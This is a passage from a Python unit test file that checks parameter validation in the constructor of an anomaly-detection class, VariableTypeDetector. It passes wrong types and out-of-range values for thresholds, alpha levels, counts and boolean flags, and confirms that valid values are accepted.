VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, gof_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, s_gof_bt_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, d_bt_alpha=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, div_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, sim_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=1.1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=0) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=0.5) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, indicator_thres=1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update=50) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update_unq=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=0) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=101, num_init=100, num_update=50) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=49, num_init=100, num_update=50) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=100, num_init=100, num_update=50) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_values=50, num_init=100, num_update=50) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_s_gof_bt=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_d_bt=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_discrete=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=-1) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=100) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_pause_others=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, test_gof_int=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_stop_update=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_without_confidence=True) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=None) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=b"True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator="True") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=123) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=123.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, silence_output_except_indicator=True) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_hist_ref=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=["Default"]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=[]) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=()) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=set()) VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update_var_type_hist_ref=100) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=-1) self.assertRaises(ValueError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=0) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=100.22) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=b"Default") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind="123") self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind={"id": "Default"}) self.assertRaises(TypeError, VariableTypeDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_var_type_considered_ind=["Default"]) 